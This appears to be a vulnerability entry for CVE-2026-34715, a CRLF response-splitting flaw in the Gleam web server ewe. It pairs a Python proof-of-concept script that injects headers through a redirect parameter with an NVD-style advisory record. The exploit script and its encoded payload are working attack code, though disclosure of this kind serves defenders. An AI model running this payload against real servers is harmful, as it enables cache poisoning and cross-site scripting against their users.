CVE-2026-34715

import requests # PoC for CVE-2026-34715: Ewe CRLF Injection # Target scenario: An endpoint setting a 'Location' header based on user input target_url = "http://localhost:4000/redirect" # The payload injects CRLF (\r\n) to split the response and add a arbitrary header # %0d is \r, %0a is \n payload = "http://evil.com%0d%0aX-Injected-Header: pwned%0d%0aContent-Length: 0%0d%0a%0d%0a" try: # Send a request with the malicious payload in the 'next' parameter response = requests.get(target_url, params={"next": payload}) print(f"Status Code: {response.status_code}") print("Response Headers:") for key, value in response.headers.items(): print(f"{key}: {value}") # Check if the injection was successful (e.g. custom header present or body modified) if "X-Injected-Header" in response.headers: print("[+] Vulnerability exploited: Header injection successful!") else: print("[-] Exploit failed or target patched.") except Exception as e: print(f"Error connecting to target: {e}")

{"cve": {"id": "CVE-2026-34715", "sourceIdentifier": "[email protected]", "published": "2026-04-02T18:16:32.910", "lastModified": "2026-04-10T16:01:12.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ewe is a Gleam web server. Prior to version 3.0.6, the encode_headers function in src/ewe/internal/encoder.gleam directly interpolates response header keys and values into raw HTTP bytes without validating or stripping CRLF (\\r\\n) sequences. An application that passes user-controlled data into response headers (e.g., setting a Location redirect header from a request parameter) allows an attacker to inject arbitrary HTTP response content, leading to response splitting, cache poisoning, and possible cross-site scripting. Notably, ewe does validate CRLF in incoming request headers via validate_field_value() in the HTTP/1.1 parser — but provides no equivalent protection for outgoing response headers in the encoder. This issue has been patched in version 3.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-113"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vshakitskiy:ewe:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.6", "matchCriteriaId": "B2FC5C49-3780-4196-A493-57F172153863"}]}]}], "references": [{"url": "https://github.com/vshakitskiy/ewe/commit/ce4ff214d32626a10fda9398dc94a2d720e17446", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vshakitskiy/ewe/releases/tag/v3.0.6", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/vshakitskiy/ewe/security/advisories/GHSA-x2w3-23jr-hrpf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/vshakitskiy/ewe/security/advisories/GHSA-x2w3-23jr-hrpf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}